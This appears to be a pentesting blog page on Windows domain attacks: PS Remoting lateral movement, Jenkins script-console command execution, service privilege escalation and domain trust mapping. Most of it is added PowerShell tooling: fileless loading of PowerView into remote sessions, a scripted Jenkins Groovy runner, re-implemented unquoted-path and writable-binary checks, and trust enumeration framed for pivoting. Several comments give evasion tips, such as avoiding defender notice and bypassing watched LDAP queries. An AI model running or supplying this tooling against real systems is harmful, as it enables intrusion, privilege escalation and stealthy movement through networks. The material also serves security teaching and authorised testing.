Powershell * POWERSHELL SECURITY

Lateral Movement PS Remoting

One to one: you need an elevated (admin) PowerShell shell to perform all of these tasks.

PS C:\WINDOWS\system32> Enable-PSRemoting -Force
PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> powershell.exe -executionpolicy bypass
PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> powershell.exe -nop -exec bypass
PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> . .\powercat.ps1
PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> . .\powerview.ps1
PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Find-LocalAdminAccess
PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> New-PSSession -ComputerName WIN-2RUMVG5JPOC.security.local
PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Enter-PSSession -Id 1
[WIN-2RUMVG5JPOC.security.local]: PS C:\Users\Administrator\Documents> whoami…
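The same one-to-one hop, written out as an added example rather than code from the post: it adds the checks you want before and after New-PSSession (is WinRM listening, is the remote token actually elevated, is the session cleaned up) and shows how to push a local script such as powerview.ps1 into the session without writing it to the target's disk. The target name is the one the post uses; the credential prompt and the order of the checks are assumptions.

```powershell
# Added example, not code from the original post. Target is taken from the post;
# the credential prompt and check order are assumptions.
$Target = 'WIN-2RUMVG5JPOC.security.local'
$Cred   = Get-Credential -Message 'Account that is a local admin on the target'   # e.g. SECURITY\victim

# 1. Fail fast if WinRM is not listening (TCP 5985/5986) instead of waiting for
#    New-PSSession to time out.
try {
    Test-WSMan -ComputerName $Target -ErrorAction Stop | Out-Null
} catch {
    throw "WinRM not reachable on ${Target}: $($_.Exception.Message)"
}

# 2. One persistent session. Every New-PSSession starts a wsmprovhost.exe on the
#    target, so open it once and reuse it instead of creating one per command.
$s = New-PSSession -ComputerName $Target -Credential $Cred -ErrorAction Stop
try {
    # 3. Confirm the remote identity and whether it is elevated. A domain account in the
    #    local Administrators group gets a full token over WinRM (no UAC split token);
    #    local accounts are subject to LocalAccountTokenFilterPolicy instead.
    $ctx = Invoke-Command -Session $s -ScriptBlock {
        $id = [Security.Principal.WindowsIdentity]::GetCurrent()
        [pscustomobject]@{
            Host    = $env:COMPUTERNAME
            User    = $id.Name
            IsAdmin = ([Security.Principal.WindowsPrincipal]$id).IsInRole(
                          [Security.Principal.WindowsBuiltInRole]::Administrator)
        }
    }
    $ctx | Format-List

    # 4. Load a local script into the remote session: -FilePath reads the file on this
    #    host and sends its contents, so nothing lands on the target's disk. Functions
    #    the script defines stay available in the session for later Invoke-Command calls.
    Invoke-Command -Session $s -FilePath .\powerview.ps1
    Invoke-Command -Session $s -ScriptBlock { Get-NetDomain }
} finally {
    # 5. Always tear the session down; a leftover session keeps wsmprovhost.exe alive
    #    on the target, which is an easy thing for a defender to notice.
    Remove-PSSession -Session $s
}
```

Enter-PSSession, as in the post, is fine for poking around interactively; for anything scripted, Invoke-Command against the saved session is the form that survives a dropped console and leaves one clean session to remove.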

Local Privilege Escalation Part 2

Assuming Jenkins is already present on the server and we have credentials for it. After logging in, go to http://192.168.65.195:8080/script/ (the script console), enter the command below and click Run.

Code:
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'whoami'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out>$sout err> $serr"

Now try…
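Clicking Run in the browser works for one command; for anything repeatable you want the same Groovy sent from PowerShell. This is an added example, not code from the post or from Jenkins: it wraps the post's snippet, takes the CSRF crumb into account (Jenkins rejects a bare POST when you authenticate with a password, and the crumb is bound to the web session) and uses the /scriptText endpoint, which runs the script and returns plain text instead of the HTML console page. The URL is the one in the post; the function name, the credential and the 10-second timeout are assumptions.

```powershell
# Added example, not code from the original post. URL is from the post; function name,
# credential and timeout are assumptions.
function Invoke-JenkinsGroovy {
    param(
        [Parameter(Mandatory)][string]$BaseUrl,            # e.g. http://192.168.65.195:8080
        [Parameter(Mandatory)][pscredential]$Credential,   # user with Overall/Administer (script console)
        [Parameter(Mandatory)][string]$Groovy
    )
    $pair    = '{0}:{1}' -f $Credential.UserName, $Credential.GetNetworkCredential().Password
    $headers = @{ Authorization = 'Basic ' + [Convert]::ToBase64String([Text.Encoding]::ASCII.GetBytes($pair)) }

    # CSRF crumb: Jenkins refuses POSTs without it under password auth. The crumb is tied
    # to the web session, so fetch it and reuse the same session for the POST.
    $session = $null
    try {
        $crumb = Invoke-RestMethod -Uri "$BaseUrl/crumbIssuer/api/json" -Headers $headers -SessionVariable session
        $headers[$crumb.crumbRequestField] = $crumb.crumb
    } catch {
        Write-Warning "No crumb issued ($($_.Exception.Message)); trying without CSRF protection"
        $session = New-Object Microsoft.PowerShell.Commands.WebRequestSession
    }

    # /scriptText runs the Groovy like /script does, but answers with the raw println output.
    Invoke-RestMethod -Uri "$BaseUrl/scriptText" -Method Post -Headers $headers `
                      -WebSession $session -Body @{ script = $Groovy }
}

# The post's snippet with the command pulled out into a variable. The output has to be
# printed, not returned: only what reaches stdout of the console ends up in the response.
$cmd    = 'whoami'
$groovy = @"
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = '$cmd'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(10000)
println "out>`$sout err>`$serr"
"@

Invoke-JenkinsGroovy -BaseUrl 'http://192.168.65.195:8080' -Credential (Get-Credential) -Groovy $groovy
```

Whatever `whoami` prints is the account the Jenkins service runs as, which is the whole point of the check: on a Windows host that is frequently LocalSystem or a service account with far more rights than the web login that got you in.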

Local Privilege Escalation Part 1

Service issues using PowerUp:

PS C:\Users\victim.SECURITY\Downloads\ > Get-ServiceUnquoted -Verbose

Get services where the current user can write to its binary path or change arguments to the binary:

PS C:\Users\victim.SECURITY\Downloads\ > Get-ModifiableServiceFile -Verbose

Get the services whose configuration…
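To see what the two PowerUp checks actually test for, here is an added example (not code from the post or from PowerUp) that re-implements them in plain PowerShell: unquoted service paths with a space, enumerated together with the directories the Service Control Manager would search first, and service binaries whose ACL lets the current token write to them. The function names are assumptions and are not PowerUp's; paths that use environment variables (e.g. %SystemRoot%) are skipped, and Deny ACEs are ignored, so a hit is a candidate to confirm by hand, not proof.

```powershell
# Added example, not code from the post or from PowerUp. Function names are assumptions.

function Get-CurrentUserSid {
    # Every SID the current token carries: the user plus all groups (Users, Authenticated Users, ...)
    $id = [Security.Principal.WindowsIdentity]::GetCurrent()
    @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })
}

function Test-WritableByCurrentUser {
    param([Parameter(Mandatory)][string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return $false }   # also skips %SystemRoot%-style paths
    $mine  = Get-CurrentUserSid
    # Any of these rights lets us replace the file, or drop a file into the directory.
    $write = [int][Security.AccessControl.FileSystemRights]'WriteData, AppendData, Modify, FullControl, ChangePermissions, TakeOwnership'
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }   # Deny ACEs ignored: can give a false positive
        try   { $sid = $ace.IdentityReference.Translate([Security.Principal.SecurityIdentifier]).Value }
        catch { continue }                                     # orphaned or untranslatable identity
        if ($mine -contains $sid -and (([int]$ace.FileSystemRights) -band $write)) { return $true }
    }
    return $false
}

function Get-ServiceBinaryPath {
    # '"C:\Program Files\X\svc.exe" -arg' or 'C:\Program Files\X\svc.exe -arg'  ->  the exe path
    param([string]$PathName)
    if ($PathName -match '^"([^"]+)"')  { return $Matches[1] }
    if ($PathName -match '^(.+?\.exe)') { return $Matches[1] }   # lenient: up to the first .exe
    return $null
}

function Get-UnquotedServicePath {
    # Unquoted binary path containing a space: the SCM tries each space-delimited prefix
    # plus ".exe" before the real binary, so a writable directory along the way wins.
    foreach ($svc in Get-CimInstance Win32_Service) {
        $p = $svc.PathName
        if (-not $p -or $p -match '^["'']') { continue }
        $bin = Get-ServiceBinaryPath $p
        if (-not $bin -or $bin -notmatch '\s') { continue }
        $parts = $bin -split ' '
        # Spoof candidates for C:\Program Files\Vuln App\svc.exe:
        #   C:\Program.exe  and  C:\Program Files\Vuln.exe
        $spoof = for ($i = 1; $i -lt $parts.Count; $i++) { ($parts[0..($i - 1)] -join ' ') + '.exe' }
        [pscustomobject]@{
            ServiceName   = $svc.Name
            PathName      = $p
            StartName     = $svc.StartName   # the account the payload would run as
            WritableSpoof = @($spoof | Where-Object { Test-WritableByCurrentUser (Split-Path -Parent $_) })
        }
    }
}

function Get-ModifiableServiceBinary {
    # Services whose binary the current user can overwrite: swap it, restart the service
    # (or reboot) and the replacement runs as StartName.
    foreach ($svc in Get-CimInstance Win32_Service) {
        $bin = Get-ServiceBinaryPath $svc.PathName
        if ($bin -and (Test-WritableByCurrentUser $bin)) {
            [pscustomobject]@{ ServiceName = $svc.Name; Binary = $bin; StartName = $svc.StartName }
        }
    }
}

Get-UnquotedServicePath | Where-Object WritableSpoof | Format-List
Get-ModifiableServiceBinary | Format-Table -AutoSize
```

An unquoted path on its own is only a finding if one of the spoof directories is writable, which is why the first function carries the directory check; on a default Windows install C:\ and C:\Program Files are not, and the interesting hits are third-party installs under their own directories.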

Domain Enumeration Part 4

Domain Trust Mapping: Get a list of all domain trusts for the current domain:

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Get-NetDomainTrust
PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Get-NetDomainTrust -domain ujjtest.security.local
PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master> Get-ADTrust
PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master> Get-ADTrust -Identity setest.local
PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master> (Get-ADForest).domains

Forest Mapping: Get all global catalogs for the current forest:

Map trusts of a forest:

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView>…
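Both halves of this post, the domain trusts and the forest map (domains, global catalogs, forest trusts), can be pulled without PowerView or the AD module from the .NET System.DirectoryServices.ActiveDirectory classes, which only need a domain-joined host. The following is an added example and not code from the post or from either tool; the function name is an assumption, and it throws if the host is not domain-joined.

```powershell
# Added example, not code from the post, PowerView or the AD module. Function name is an
# assumption. Needs a domain-joined host; GetCurrentDomain() throws otherwise.
Add-Type -AssemblyName System.DirectoryServices

function Get-TrustMap {
    $domain = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
    $forest = $domain.Forest

    # Direction is from this domain's point of view: Outbound = we trust them (their users
    # can reach our resources); Inbound = they trust us, so accounts from here can
    # authenticate there; Bidirectional = both. Inbound or Bidirectional is what matters
    # when you hold a foothold here and want to move into the other domain.
    $trusts = @(foreach ($t in $domain.GetAllTrustRelationships()) {
        [pscustomobject]@{ Scope = 'Domain'; Source = $t.SourceName; Target = $t.TargetName
                           Type = $t.TrustType; Direction = $t.TrustDirection }
    })
    # Forest-level trusts (forest and external trusts of the root) are listed separately.
    $trusts += @(foreach ($t in $forest.GetAllTrustRelationships()) {
        [pscustomobject]@{ Scope = 'Forest'; Source = $t.SourceName; Target = $t.TargetName
                           Type = $t.TrustType; Direction = $t.TrustDirection }
    })

    [pscustomobject]@{
        Forest         = $forest.Name
        RootDomain     = $forest.RootDomain.Name
        Domains        = @($forest.Domains | ForEach-Object Name)
        # Global catalogs answer partial-attribute queries for the whole forest, so one GC
        # is enough to enumerate every domain's users and groups.
        GlobalCatalogs = @($forest.GlobalCatalogs | ForEach-Object { '{0} ({1})' -f $_.Name, $_.IPAddress })
        Trusts         = $trusts
    }
}

$map = Get-TrustMap
$map | Format-List Forest, RootDomain, Domains, GlobalCatalogs
$map.Trusts | Format-Table -AutoSize
```

Get-NetDomainTrust and Get-ADTrust in the post return the same SourceName/TargetName/Direction triple from LDAP; the .NET call goes through the DC's RPC interface instead, which is a useful fallback when LDAP queries are being watched or RSAT cannot be loaded.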